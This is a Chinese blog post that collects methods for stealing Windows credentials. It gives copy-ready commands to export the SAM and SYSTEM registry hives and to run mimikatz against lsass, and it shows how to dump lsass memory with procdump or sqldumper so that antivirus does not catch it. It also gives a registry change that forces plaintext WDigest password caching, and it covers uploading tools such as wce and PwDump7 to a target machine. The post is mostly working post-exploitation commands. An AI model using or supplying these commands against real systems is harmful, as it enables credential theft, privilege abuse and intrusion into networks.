常用抓密码方法整理

简介: 常用抓密码方法整理

一、mimikatz工具抓取密码:

1.抓取本地SAM文件中的密码

①从注册表中导出




reg save HKLM\SYSTEM sys.hiv     #获取SYSTEM注册表信息,导出为sys.hiv文件reg save HKLM\SAM sam.hiv        #获取SAM注册表信息,导出为sam.hiv文件


②还可以使用nihsang中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件


Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination sam


②导出SYSTEM文件


Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination sys





用mimikatz解密导出的两个文件




privilege::debug   #提升权限lsadump::sam /sam:sam.hiv /system:sys.hiv     #mimikatz运行解密命令


用impacket中的secretsdump解密:


secretsdump.exe -sam SAM -system SYSTEM LOCAL


②在线方式获取sam文件hash





privilege::debug    #提升权限token::elevatelsadump::sam    #导出sam文件中的hash



2.抓取内存的密码-lsass进程获取hash

1、直接上传mimikatz在线获取:




privilege::debug   #提升权限sekurlsa::logonpasswords full   #抓lsass进程中的密码



2、prodump+mimikatz

①把lsass进程文件拖回本地破解(因为直接上传会报杀)注意工具与目标系统位数要一致


procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp     #在目标机子执行导出为lsass.dmp,然后拖回本地


③挂载lsass.dmp文件


sekurlsa::minidump lsass.dmp#挂载lsass.dmp


④抓取lsass.dmp文件中的密码




log  #会在目录下生成.log文件,方便查看sekurlsa::logonpasswords full #mimikatz执行,在拖回的.dmp文件抓取密码


3、sqldumper+mimikatz

①首先查看lsass进程的PID


tasklist /svc |findstr lsass.exe


②利用sqldumper转储


Sqldumper.exe <PID> 0 0x01100    #后面的数字是固定的,然后就会生成Sqlxxx.mdmp文件


③利用mimikatz抓取hash



sekurlsa::minidump SQLDmpr0001.mdmpsekurlsa::logonPasswords full


需要说明一下的是,当系统为win10或者win2012R2以上时,默认内存缓存中禁止保存明文密码,此时可以通过修改组测表的方式抓取明文,但是需要用户重新登陆后才能抓取成功

命令如下:


reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

当重启服务器的时候,我们重新加载mimikatz,就可以抓取密码。



二、使用其它工具抓密码

①wce

upload传上去,目标cmdshell下输入


wce.exe -w    #命令抓取明文密码



wce.exe -l    #可以抓到ntlm的哈希值


②GetPass

根据目标机器系统位数上传


getpassword_x64.exe


③PwDump7


PwDump7.exe


④QuarksPwDump


QuarksPwDump.exe --dump-hash-local


还可以使用msf和cs抓密码,具体方法也比较简单,就不再阐述了


文章仅作为参考,如果有错误的地方请多包涵...

收录于合集 #内网/域渗透

28

下一篇SSH隧道端口转发详解


目录
相关文章
|
小程序 数据安全/隐私保护
吐血整理的几十款小程序登陆界面【附完整代码】(一)
吐血整理的几十款小程序登陆界面【附完整代码】
7931 1
吐血整理的几十款小程序登陆界面【附完整代码】(一)
|
4月前
|
安全 Android开发 iOS开发
《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(8)-Fiddler如何设置捕获会话
【7月更文挑战第23天】前边几篇宏哥介绍了Fiddler界面内容以及作用。今天宏哥就讲解和分享如何设置Fiddler后,我们就可以捕获会话,进行抓包了。本文将指导如何设置Fiddler以捕获会话数据。
92 10
《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(8)-Fiddler如何设置捕获会话
|
6月前
|
安全 Android开发 iOS开发
《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(8)-Fiddler如何设置捕获会话
【2月更文挑战第9天】《吐血整理》进阶系列教程-拿捏Fiddler抓包教程(8)-Fiddler如何设置捕获会话
82 5
谈一谈|Fiddler实现简单的抓包与纂改数据
谈一谈|Fiddler实现简单的抓包与纂改数据
466 0
|
小程序
吐血整理的几十款小程序登陆界面【附完整代码】(三)
吐血整理的几十款小程序登陆界面【附完整代码】(三)
446 0
吐血整理的几十款小程序登陆界面【附完整代码】(三)
|
小程序
吐血整理的几十款小程序登陆界面【附完整代码】(二)
吐血整理的几十款小程序登陆界面【附完整代码】(二)
378 0
吐血整理的几十款小程序登陆界面【附完整代码】(二)
|
存储 缓存 安全
图解用户登录验证流程,写得太好了!
图解用户登录验证流程,写得太好了!
353 0
图解用户登录验证流程,写得太好了!
rpcms后台地址忘了怎么办?来教你找回
rpcms如果忘记后台地址了,如何找回的方法。1、如果你在安装rpcms的时候没有自定义后台地址,或者没有填写,那默认就是admin。2、如果你修改过了,那就在setting/config/default.php(V3.0以下在config.php)文件中查看,找到diy_admin,这个参数的值就是自定义的后台地址。
rpcms后台地址忘了怎么办?来教你找回
|
人工智能 文字识别 网络协议
关于我尝试抓包微信失败后想到的新方法居然和奥特曼有关~
关于我尝试抓包微信失败后想到的新方法居然和奥特曼有关~ 以前 微信网页版 还可以登录的时候,我们还可以使用 python 帮助我们实现 自动化操作,调用各种各样的 API ,做做机器人啥的 ,但是现在呢~ 微信网页版 好像不开放了😐 扫码登录都会出现下面的画面 😵 来到之前 很火的 python 库 wxpy, 我看到下面这个场景, 果然也是一片哀嚎 哈哈哈 wireshark 抓包 于是我做了个大胆的决定,尝试用 wireshark 去抓取微信发出的数据包~ (我实在太天真了!🙃) 在电脑上打开微信,参考下面三次握手的图~ 可以看到这里就已经 发出了这么多信息 我晕
309 0
小技巧 - 禁止复制的网站如何破解复制功能(知乎,360图书馆)?
小技巧 - 禁止复制的网站如何破解复制功能(知乎,360图书馆)?
473 0
小技巧 - 禁止复制的网站如何破解复制功能(知乎,360图书馆)?